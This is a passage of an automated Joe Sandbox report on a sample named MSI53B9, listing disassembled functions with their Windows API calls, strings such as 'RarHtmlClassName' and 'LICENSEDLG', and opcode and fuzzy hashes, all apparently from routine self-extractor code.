                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                              • String ID: STATIC
                                              • API String ID: 1444658586-1882779555
                                              • Opcode ID: 519b05cfea3c7ce7828638292437d5fb08cd8d4118e6ee2bff5228a3597e7d98
                                              • Instruction ID: de04e75d3c7caa7d2e492b8fb9bffbd3afca8b9f8c45512c95cd82ad8e8f4a6f
                                              • Opcode Fuzzy Hash: 519b05cfea3c7ce7828638292437d5fb08cd8d4118e6ee2bff5228a3597e7d98
                                              • Instruction Fuzzy Hash: 0721D1726402247BEB217B68DC4AFAE7A6CFF45710F004011FA01E6991EB649D0287B6
                                              APIs
                                              • _free.LIBCMT ref: 0089623F
                                                • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
                                                • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                              • _free.LIBCMT ref: 0089624B
                                              • _free.LIBCMT ref: 00896256
                                              • _free.LIBCMT ref: 00896261
                                              • _free.LIBCMT ref: 0089626C
                                              • _free.LIBCMT ref: 00896277
                                              • _free.LIBCMT ref: 00896282
                                              • _free.LIBCMT ref: 0089628D
                                              • _free.LIBCMT ref: 00896298
                                              • _free.LIBCMT ref: 008962A6
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 84727e752cf5e540588c5a313db423133813aaf5acd19e36fe36a7c9eaf59412
                                              • Instruction ID: 329ecddd819d9ce540fb81caaa021b7c01341a9d4810c6eff37435b6f84a513a
                                              • Opcode Fuzzy Hash: 84727e752cf5e540588c5a313db423133813aaf5acd19e36fe36a7c9eaf59412
                                              • Instruction Fuzzy Hash: 39117775610608EFDF02FF98DC52DD93F65FF04360B5545A5BA888F122DA31DE509B41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ;%u$x%u$xc%u
                                              • API String ID: 0-2277559157
                                              • Opcode ID: 5c289556f9198bd0bb02cccfb5fbe69ea105cd1c3314096adce083c4856b5e23
                                              • Instruction ID: 6e116eab2edd07890d37ac980325265105f266eb1dbaafde2f1648c4f9b47164
                                              • Opcode Fuzzy Hash: 5c289556f9198bd0bb02cccfb5fbe69ea105cd1c3314096adce083c4856b5e23
                                              • Instruction Fuzzy Hash: D4F126716042805BDB19EE688895BEA7799FF94300F08C46DF88EDB29FDB24D944C763
                                              APIs
                                                • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                              • EndDialog.USER32(?,00000001), ref: 008899AF
                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 008899DC
                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008899F1
                                              • SetWindowTextW.USER32(?,?), ref: 00889A02
                                              • GetDlgItem.USER32(?,00000065), ref: 00889A0B
                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00889A1F
                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00889A31
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                              • String ID: LICENSEDLG
                                              • API String ID: 3214253823-2177901306
                                              • Opcode ID: 2516246b9d5ba63490d16e9631375448323eb80a85e5f612b3457aeba26535b1
                                              • Instruction ID: 9def3b2e1ff674105a9c1d73c6ce7f2d799e4a11546fa97362f0728b93458bf7
                                              • Opcode Fuzzy Hash: 2516246b9d5ba63490d16e9631375448323eb80a85e5f612b3457aeba26535b1
                                              • Instruction Fuzzy Hash: 4421D632240114BBE615BB69ED49E7B3FADFB47B94F054018F640E2891CB66AC01D772
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00879232
                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00879255
                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00879274
                                                • Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28
                                              • _swprintf.LIBCMT ref: 00879310
                                                • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                              • MoveFileW.KERNEL32(?,?), ref: 00879385
                                              • MoveFileW.KERNEL32(?,?), ref: 008793C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                              • String ID: rtmp%d
                                              • API String ID: 2111052971-3303766350
                                              • Opcode ID: 90f918a60a64044f447ffb8163633d0239f3f1a008aa14deb036caf624dba89a
                                              • Instruction ID: 230773f68e562cd95df5b9009eb75f1cb2956cf55e8040682457011df3950d81
                                              • Opcode Fuzzy Hash: 90f918a60a64044f447ffb8163633d0239f3f1a008aa14deb036caf624dba89a
                                              • Instruction Fuzzy Hash: AE416871911258A6DF20FBA88D85EEE777DFF05380F0080A5E58DE315AEA34CB458F62
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00887DAF
                                              • GetTickCount.KERNEL32 ref: 00887DCD
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00887DE3
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00887DF7
                                              • TranslateMessage.USER32(?), ref: 00887E02
                                              • DispatchMessageW.USER32(?), ref: 00887E0D
                                              • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00887EBD
                                              • SetWindowTextW.USER32(?,00000000), ref: 00887EC7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                              • String ID:
                                              • API String ID: 4150546248-0
                                              • Opcode ID: 60f37ce176876f781ccd85f0cc216b45f9a1fc75b41a600903ada7d9adde1a60
                                              • Instruction ID: 4bcef69e9489e95c86fbed517f7d29b6eb7da58094f66e83c035a09cf2552b2d
                                              • Opcode Fuzzy Hash: 60f37ce176876f781ccd85f0cc216b45f9a1fc75b41a600903ada7d9adde1a60
                                              • Instruction Fuzzy Hash: F6415971208306AFD714EF65C88892BBBF9FF89B05B10086DB646C7611DB71EC45CB62
                                              APIs
                                              • __aulldiv.LIBCMT ref: 0087FE33
                                                • Part of subcall function 0087A8E0: GetVersionExW.KERNEL32(?), ref: 0087A905
                                              • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0087FE5C
                                              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0087FE6E
                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0087FE7B
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0087FE91
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0087FE9D
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0087FED3
                                              • __aullrem.LIBCMT ref: 0087FF5D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                              • String ID:
                                              • API String ID: 1247370737-0
                                              • Opcode ID: df5882e55db8b49c7ee84c80dccb44061b27680a52221260f4b02841edd2c713
                                              • Instruction ID: c5728cc8ea80000e6109ebb245e32929aacf9d05adad6b5e30077fdba084a3d3
                                              • Opcode Fuzzy Hash: df5882e55db8b49c7ee84c80dccb44061b27680a52221260f4b02841edd2c713
                                              • Instruction Fuzzy Hash: A44128B24083059FC310DF65C8809ABB7F8FF88714F008A2EF69AD2651EB35E548DB52
                                              APIs
                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0089CCE2,00000000,00000000,00000000,00000000,00000000,00892C4E), ref: 0089C5AF
                                              • __fassign.LIBCMT ref: 0089C62A
                                              • __fassign.LIBCMT ref: 0089C645
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0089C66B
                                              • WriteFile.KERNEL32(?,00000000,00000000,0089CCE2,00000000,?,?,?,?,?,?,?,?,?,0089CCE2,00000000), ref: 0089C68A
                                              • WriteFile.KERNEL32(?,00000000,00000001,0089CCE2,00000000,?,?,?,?,?,?,?,?,?,0089CCE2,00000000), ref: 0089C6C3
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: 3cb5cfea0b353e741ffb006acc8e620777f36e73ba093633c6277a43786776f2
                                              • Instruction ID: 8d0dbc9b501a8c47f834ee85e4511321c17aff3cfe24b479c58f05ff39490328
                                              • Opcode Fuzzy Hash: 3cb5cfea0b353e741ffb006acc8e620777f36e73ba093633c6277a43786776f2
                                              • Instruction Fuzzy Hash: 9251B3B1A00209AFDF14DFA8D885AEEBBF4FF19300F18415AE556E7251E7319940CF65
                                              APIs
                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0088B0EF
                                              • _swprintf.LIBCMT ref: 0088B123
                                                • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                              • SetDlgItemTextW.USER32(?,00000066,008B3122), ref: 0088B143
                                              • _wcschr.LIBVCRUNTIME ref: 0088B176
                                              • EndDialog.USER32(?,00000001), ref: 0088B257
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                              • String ID: %s%s%u
                                              • API String ID: 2892007947-1360425832
                                              • Opcode ID: 1878960ea2eb97722cec61ebb1d741ed2a4e694c610435a3429d7c38669a801c
                                              • Instruction ID: 0f07d559673fdf8c3b60c1fde665d3f83cca56ec68b64f07e0ff7e80e2fd1c6b
                                              • Opcode Fuzzy Hash: 1878960ea2eb97722cec61ebb1d741ed2a4e694c610435a3429d7c38669a801c
                                              • Instruction Fuzzy Hash: 81415E71900219AEEF25EBA4DC85EEF77BDFB58304F0040A6F509E6151EB749B848F61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                              • String ID: %08x
                                              • API String ID: 1593746830-3682738293
                                              • Opcode ID: d311f84d731403f7b33dade2d73386beb34b5e68f463faeaba92e0f782313591
                                              • Instruction ID: c8c7db595ff7cc08f82445983f1dad106a1861c2e0f97600adbc7ca70b50e0a8
                                              • Opcode Fuzzy Hash: d311f84d731403f7b33dade2d73386beb34b5e68f463faeaba92e0f782313591
                                              • Instruction Fuzzy Hash: 3041F372904358AAE730E668CC49ABBB7DCFB85710F14452EFA4CE7186D630DD04C662
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00888705,?), ref: 00887FBA
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00887FDB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AllocByteCharGlobalMultiWide
                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                              • API String ID: 3286310052-4209811716
                                              • Opcode ID: 45c33956df3f1f8a46c435b2be93e05e93b25f0a04d22ba33320497fc4ea3237
                                              • Instruction ID: aa2b38ed8ad681459f227be79e9535fa95dd40bb604099ec560fbb1bbfe229ca
                                              • Opcode Fuzzy Hash: 45c33956df3f1f8a46c435b2be93e05e93b25f0a04d22ba33320497fc4ea3237
                                              • Instruction Fuzzy Hash: 5A31F5721083157AEB25BB289C06FABB7A8FF52320F24410AF510D61C2EF74D909C7A6
                                              APIs
                                              • ShowWindow.USER32(?,00000000), ref: 008885B5
                                              • GetWindowRect.USER32(?,?), ref: 008885DA
                                              • ShowWindow.USER32(?,00000005,?), ref: 00888671
                                              • SetWindowTextW.USER32(?,00000000), ref: 00888679
                                              • ShowWindow.USER32(00000000,00000005), ref: 0088868F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Window$Show$RectText
                                              • String ID: RarHtmlClassName
                                              • API String ID: 3937224194-1658105358
                                              • Opcode ID: 34ae09a0684174647653ce9f3b7613faafad8fc493368c44a2c3c5d9acb27159
                                              • Instruction ID: 415ebd6d60b51cf94b99c966ca18b4017f6d7fece265fed59a9d8ded796ad5f2
                                              • Opcode Fuzzy Hash: 34ae09a0684174647653ce9f3b7613faafad8fc493368c44a2c3c5d9acb27159
                                              • Instruction Fuzzy Hash: F3319E31500214EFD725AF649D4CA2BBBA9FB49711F044459FD49AA992EB30E910CBB2
                                              APIs
                                                • Part of subcall function 008992D3: _free.LIBCMT ref: 008992FC
                                              • _free.LIBCMT ref: 0089935D
                                                • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
                                                • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                              • _free.LIBCMT ref: 00899368
                                              • _free.LIBCMT ref: 00899373
                                              • _free.LIBCMT ref: 008993C7
                                              • _free.LIBCMT ref: 008993D2
                                              • _free.LIBCMT ref: 008993DD
                                              • _free.LIBCMT ref: 008993E8
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                              • Instruction ID: 465b4f414159d33bd9906e71ed4972b32c8547e30c9961abc709a40895e0d6b7
                                              • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                              • Instruction Fuzzy Hash: 88111D71941B04F6ED21BBB8DC06FCB7B9CFF00710F484819B2E9E6452DAA5A5044762
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00890C0B,0088E662), ref: 00890C22
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00890C30
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00890C49
                                              • SetLastError.KERNEL32(00000000,?,00890C0B,0088E662), ref: 00890C9B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 20e4df08e1b9e3d51de31876761eecfe20da87e60fa814100b9ecf164e954fe3
                                              • Instruction ID: 2084799b026af9b96aa2c955e262a2f6e03c9399f2a4939b113c220787a0f515
                                              • Opcode Fuzzy Hash: 20e4df08e1b9e3d51de31876761eecfe20da87e60fa814100b9ecf164e954fe3
                                              • Instruction Fuzzy Hash: 6C01883624D7166EBF6937B87C8993B3644FB127B9B38032AF515D54E1FF114C009945
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                              • API String ID: 0-1718035505
                                              • Opcode ID: 6e655e70526bd2ec59c8bf74f446d123c9190e192e3624cc7de4f7515e6dd816
                                              • Instruction ID: 25dccbddbed513aa059bff4f38cfcc10148209edc903e1360830c1d8b987ed2a
                                              • Opcode Fuzzy Hash: 6e655e70526bd2ec59c8bf74f446d123c9190e192e3624cc7de4f7515e6dd816
                                              • Instruction Fuzzy Hash: 1F01F472AC16215B6F202EB09C89AA727D4FB0379A711003AE920D3A44E734C849ABF1
                                              APIs
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 008800AE
                                                • Part of subcall function 0087A8E0: GetVersionExW.KERNEL32(?), ref: 0087A905
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008800D0
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 008800EA
                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008800FB
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0088010B
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880117
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion
                                              • String ID:
                                              • API String ID: 2092733347-0
                                              • Opcode ID: f1920e4871fd575b8f7be64496aea2c36141a5d47ca9261f74d607bf494ae012
                                              • Instruction ID: be223afd889df3b595a9da379242f8590a2c85840fe64e9061e7f030f99158d6
                                              • Opcode Fuzzy Hash: f1920e4871fd575b8f7be64496aea2c36141a5d47ca9261f74d607bf494ae012
                                              • Instruction Fuzzy Hash: 3031F67A1083459BC740EFA8C8849ABB7F8FF98704F04491EF999C3210E734D549CB26
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
